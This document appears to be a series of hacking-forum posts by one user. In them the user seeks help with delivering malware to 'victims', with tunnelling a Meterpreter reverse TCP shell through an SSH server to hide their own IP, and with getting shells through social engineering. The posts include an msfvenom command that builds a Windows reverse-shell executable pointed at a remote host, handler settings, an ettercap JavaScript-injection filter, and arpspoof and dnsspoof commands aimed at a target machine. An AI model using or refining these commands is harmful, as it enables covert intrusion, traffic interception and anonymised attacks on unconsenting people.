kdlsw

I do not have too much experience with ios. For Android, a simple social engineering to let the victim install the malware apk would be sufficient. But from my understanding, all APPs on ios are required to be installed via AppStore, if I cannot poison the traffic of the victim, what's the usual way to deliver a trojan or malware to a target? Or if there is any good articles/books I can look into? thanks!

This is exactly what I was trying to do, the entire ssh thing was meant to accomplish this goal, but it did not work. If I do ssh -N -R 80:localhost:80 user@aaa.aaa.aaa.aaa on my "local" console, and run apache on my "local", I was able to access the "local" apache server by accessing aaa.aaa.aaa.aaa:80 from outside. But this trick did not work with metasploit, I mean if I run ssh -N -R 12345:localhost:12345 user@aaa.aaa.aaa.aaa and set the multi-handler to listen on local machine at 12345, while the trojan was configured to send stager or a direct shell to aaa.aaa.aaa.aaa:12345, it doesn't work. How should I do this correctly? Thank you BTW, the "local" machine was never running a sshd service, it was not a ssh server, it connects to "my server" via ssh -R, "my server" is the one running sshd.

@digip Thank you very much for replying me, I think I did not address my situation and question clearly, and it leads to some misunderstanding, I am sorry about that. I am not trying to let victims to connect to my local machine via ssh, I am trying to let them connect to one of my server via a standard meterpreter reverse tcp connection, and the server will send this connection back to my local machine, like this : Victims--------(reverse tcp)--------> my server-----------(remote SSH)--------->my local kali The reasons I am doing this are 1: I am inside a LAN, port forwarding is not very easy here. 2: I do not wish to reveal my local ip address nor a opened listening port to the victims I think this question must has been asked before, since we all use tor and many layers of proxies to hide ourselves in normal forward scans/connections, there must be some similar consideration of remaining anonymous in a reverse shell connection. But I really couldn’t find any. This configuration is tested with netcat and apache, local kali is able to receive connection from the victim machine during the test, it only doesn’t work when this comes to meterpreter reverse tcp, in fact, to be more accurate, when it comes to multi handler, because if I set netcat listening on the reverse tcp connection port, I was able to receive some inbound traffic (just not establishing a valid connection, since it is not the right handler). From victim’s machine, no listening port detected even when I got the multi handler listening, and I tested the handler inside my LAN, it is working. So, maybe the multi handler was not binding with the ssh tunnel? I apologize for my last unclear description. Please, if there is any solutions or workarounds on this problem, share with me, thank you!

My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handler configuration under msf msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.102 yes The listen address LPORT 45679 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target Then I exploit, nothing happens on the handler, no session receive, but the ssh terminal continuously showing the following message once I run the malware on the victim machine connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. I did a scan on aaa.aaa.aaa.aaa:45679, no open port discovered. Since NC and apache test works, SSH tunnel should be functioning properly, so it is the handler's problem? My thought is, the multi handler is somehow not listening/connecting to the tunneled port, but I am not sure how could that happen, doesn't remote ssh tunnel automatically apply to global once the command is running? Any ideas, or workarounds? This should be a FAQ, yet, couldn't find right way... Thank you

I found it quite difficult to actually get a shell these days, I am wondering how you guys do it, anyway, here is what I did On the LAN side, with mitm attack and injection, beef, it’s reasonably efficient to harvest credential, but a little hard to pwn a device, usually I need to send a fake social engineering request to let the victim to run some payloads. Remotely, I can bind some malicious payloads with normal files, and with a lot of social engineering, I can sometime get a shell then escalate privilege with my scripts. But these tricks (both LAN and internet) are not always reliable as they highly depending on social engineering, people these days don’t install program easily and they check URLs a lot. I am not sure what to do next to get shells more reliably, are there any better ways to handle it instead of hoping the user is a layman? Should I look into shellcode exploits and client side vulnerability? And most consoles are behind a router, which made direct vulnerability scan impossible I assume? Please, any suggestions will be appreciated, thank you!

Thank you, this is helpful! I will try it!

@digipThanks, I will look into that. so many options for mitm these days, I just tested MITMF, another similar tool, which didn't work for me too well, hope this one is good. Thank you.

I'm trying to perform a javascript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are before 2016, I am not sure if this kind of attack still works now? Anyway, this is my filter script if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "<head>")) { replace("<head>", "<HEAD>"); msg("Code injected"); } } And I run it as ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100// test.ef is the compiled filter file. When the victim opens any web page, I got a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the html source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part, if (ip.proto == TCP && tcp.dst == 80) { replace("<head>", "<HEAD>"); msg("Code injected"); } "Code injected" message shows, but html code on the web client is not changed, which means, the problem is that the filter cannot find any named strings (in this case <head>) in the html file, it can only deal with the header (Accept-Encoding). Does anyone know a solution or work around, please, any suggestions will be appreciated, thanks

Hi, I did a pentest in a LAN, some weird things happened. This LAN is a little unusual, there are two routers, say A and B, A is directly connected to an optical fiber, doing PPPoE, to the WAN, it has a gateway of 192.168.1.1, B is connected to A, wireless router, with a gateway of 192.168.0.1. All the clients and my Kali machine are connected to B. Target has an IP of 192.168.0.104 Here is what I did with Kali, I use the following to arp spoof the target and router B arpsoof -i eth0 -t 192.168.0.1 192.168.0.104 arpsoof -i eth0 -t 192.168.0.104 192.168.0.1 sysctl -w net.ipv4.ip_forward=1 Then I did a Dns Spoof with dnsspoof -i eth0 -f dnshost.spoof It did not work, all the traffic went through my Kali, but the target was still able to access the original webpage. And here comes the weird thing. I stopped the dnsspoof, stopped the ip forwarding sysctl -w net.ipv4.ip_forward=0 and I started the exactly the same exact dnsspoof as last time again, it worked! This really confused me, because after that, I tried to start arpspoof and dnsspoof without setting ip_forward to 1 at all, I left it to be the default 0, and it did not work, because the arp traffic was not working (which is excepted!!). ArpSpoof and dnsspoof both work ONLY IF the process "ip forwarding is firstly enabled and then disabled" completed once, before launching dnsspoof. Ip forwarding only on gives dnsspoof not working, ip forwarding only always off gives arpspoof not working. Besides that, two more strange things I failed to understand. 1, Sometimes, the "ip forward on and off" cycle must be done in the same terminal where the dnsspoof takes place, in order to make it work. Switching on then off in another terminal simply leads to arpspoof failure. 2, Here is the log/feedback of a DnsSpoof root@kali:~# dnsspoof -i eth0 -f dnshost.spoof dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113] 192.168.0.104.62290 > 192.168.1.1.53: 4678+ A? www.youtube.com 192.168.0.104.62290 > 192.168.0.1.53: 4678+ A? www.youtube.com 192.168.0.104.65063 > 192.168.1.1.53: 31827+ A? www.youtube.com 192.168.0.104.65063 > 192.168.0.1.53: 31827+ A? www.youtube.com 192.168.0.104.55426 > 192.168.1.1.53: 51608+ A? www.sina.com 192.168.0.104.55426 > 192.168.0.1.53: 51608+ A? www.sina.com 192.168.0.104.54794 > 192.168.1.1.53: 5651+ A? www.sina.com 192.168.0.104.54794 > 192.168.0.1.53: 5651+ A? www.sina.com 192.168.0.104.60485 > 192.168.1.1.53: 2950+ A? www.sina.com 192.168.0.104.63394 > 192.168.1.1.53: 41196+ A? www.facebook.com 192.168.0.104.63394 > 192.168.0.1.53: 41196+ A? www.facebook.com 192.168.0.104.52953 > 192.168.1.1.53: 6912+ A? www.facebook.com 192.168.0.104.52953 > 192.168.0.1.53: 6912+ A? www.facebook.com ^Croot@kali:~# dnsspoof -i eth0 -f dnshost.spoof dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113] 192.168.0.104.53807 > 192.168.1.1.53: 60485+ A? www.youtube.com 192.168.0.104.53807 > 192.168.1.1.53: 60485+ A? www.youtube.com 192.168.0.104.50239 > 192.168.1.1.53: 28894+ A? www.sina.com 192.168.0.104.50239 > 192.168.1.1.53: 28894+ A? www.sina.com The second launch was a failed one, the first one succeeded. The router I am targeting should be 192.168.0.1, as the router B, in the second launch, it is interacting with only router A (192.168.1.1), I am not sure what does that mean and if it has something to do with the failure directly, because in the next few attempts, a feedback situation like this second launch worked sometimes. I am almost 100% sure this issue was due to the two routers, but I am still not able to understand why, or even find a way to make it always work. Please, any suggestion will be appreciated! Thanks

Thank you! I will take a look on them, thanks!

I know it is possible to embed some malware into a web page back in those days when JDB method works. Is it possible to execute a malware on the client simply by letting it browsing a web page these days? Thanks!